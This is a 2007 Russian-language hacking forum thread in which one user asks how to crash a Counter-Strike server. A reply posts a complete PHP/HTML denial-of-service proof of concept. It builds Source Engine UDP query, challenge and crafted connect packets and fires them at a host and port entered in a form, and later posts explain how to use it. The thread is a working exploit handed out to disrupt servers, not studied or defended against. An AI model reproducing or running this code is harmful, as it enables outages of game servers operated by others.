Взлом кс

Discussion in 'Уязвимости' started by miron8888, 23 Jul 2007.

  1. miron8888

    miron8888 New Member

    Joined:
    23 Jul 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Подскажите как можно положить сервак кс но стим !!!
     
  2. GR1z

    GR1z Banned

    Joined:
    9 Jul 2007
    Messages:
    56
    Likes Received:
    22
    Reputations:
    0
    "CSHack_By_DarkNeo"
    есть ещё Сплойт DDos сервера , есть КСхак от Фуфа ...
    работает вроде до 26 патча
     
    2 people like this.
  3. miron8888

    miron8888 New Member

    Joined:
    23 Jul 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0


    Спасибо, но если не в падлу напиши мне в асю
     
  4. _Sniper_

    _Sniper_ Banned

    Joined:
    21 Jul 2007
    Messages:
    409
    Likes Received:
    147
    Reputations:
    -17
    Code:
    <html>
    <head>
    <title>PHP Counter Strike DOS Poc</title>
    
    <style type="text/css">
    
    input {
    width: 150px;
    }
    
    td {
    font-size: 12px;
    font-family: Verdana, "Trebuchet MS";
    text-align: left;
    }
    
    span.err {
    color: red;
    }
    
    span.ok {
    color: green;
    }
    
    </style>
    
    </head>
    
    <body onload="checkpass()">
    
    <div style="width: 210px; margin: auto;">
    <form name="csform" method="post" action="cs.php">
    
    <table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
    <tr>
    <td style="width: 50px;">Host</td>
    <td colspan="2"><input name="host" type="text" value=""/></td>
    </tr>
    
    <tr>
    <td>Port</td>
    <td colspan="2"><input name="port" type="text" value=""/></td>
    </tr>
    
    <tr>
    <td>&nbsp;</td>
    <td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
    <td>Auth Type 2</td>
    </tr>
    
    <tr>
    <td>Pass</td>
    <td colspan="2"><input name="pass" type="text" value="" /></td>
    </tr>
    
    
    <tr>
    <td>&nbsp;</td>
    <td colspan="2"><input type="submit" Value="Run"/></td>
    </tr>
    
    
    </table> 
    <br/>
    </form>
    </div>
    <center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
    </body>
    </html>
    
    <?php
    
    ini_set("display_errors","0");
    
    function HELLO_PACKET()
    {
    $packet = pack("H*","FFFFFFFF");
    $packet .= "TSource Engine Query";
    $packet .= pack("H*","00");
    return $packet;
    }
    
    function CHALLENGE_PACKET()
    {
    $packet = pack("H*","FFFFFFFF");
    $packet .= "getchallenge valve";
    $packet .= pack("H*","00");
    return $packet;
    }
    
    function LOGIN_PACKET_4()
    {
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
    $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
    $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","220A0000EE02");
    return $packet;
    }
    
    function LOGIN_PACKET_2()
    {
    global $cookie;
    global $password;
    $packet = pack("H*","FFFFFFFF");
    $packet .= "connect 47 ";
    $packet .= $cookie.' "';
    $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
    $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
    $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
    $packet .= 'word\\'.$password;
    $packet .= pack("H*","22");
    return $packet;
    }
    
    function dowork($host,$port,$password,$auth)
    {
    global $password;
    global $cookie;
    # connecting to target host
    $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
    if (!$fsock) die ($errstr);
    else 
    {
    # sending hello packet
    fwrite ($fsock,HELLO_PACKET());
    fread ($fsock,100);
    # sending chalennge packet
    fwrite ($fsock,CHALLENGE_PACKET());
    # recieving cookies
    $resp = fread($fsock,100);
    # grab cookies from packet
    $cookie = substr($resp,strpos($resp,"A00000000")+10);
    $cookie = substr($cookie,0,strpos($cookie," "));
    # sending login packet
    if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
    $resp = fread($fsock,100);
    }
    }
    
    IF (isset($_POST['host']) && isset($_POST['port']))
    {
    IF (empty($_POST['pass'])) $password = "123";
    else $password = $_POST['pass'];
    $fserver = $_POST['host'];
    $fport = $_POST['port'];
    if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
    # we have to connect 2 times
    $result = dowork($fserver,$fport,$password,$fauth);
    $result = dowork($fserver,$fport,$password,$fauth);
    # parsing result
    echo "Exploit Sent";
    }
    ?>
     
  5. miron8888

    miron8888 New Member

    Joined:
    23 Jul 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0


    Не качает !!!
    Скачивает какую то пустую страничку !!!
    Качаю донлоад мастером !!!
    Если не трудно перезалей куданибудь !!! )))
     
  6. _Sniper_

    _Sniper_ Banned

    Joined:
    21 Jul 2007
    Messages:
    409
    Likes Received:
    147
    Reputations:
    -17
    Выключи интеграцию в браузер и качай. если не допрёш как выключить то качай через оперу или другой браузер кроме IE
     
  7. miron8888

    miron8888 New Member

    Joined:
    23 Jul 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0


    Я уже выкачал !!! Спасибо GR1z что выложил !!!
    Только есть одна проблемка !!!
    Как узнать rcon сервака ???
     
  8. GR1z

    GR1z Banned

    Joined:
    9 Jul 2007
    Messages:
    56
    Likes Received:
    22
    Reputations:
    0
    какой *** ркон ... там ясно написано пассворд .... если есть на сервере пароль ,
    то там указуеш ... если нет , ничё неменяй
     
  9. miron8888

    miron8888 New Member

    Joined:
    23 Jul 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0


    Ясненько )))
     
    #9 miron8888, 23 Jul 2007
    Last edited: 30 Jul 2007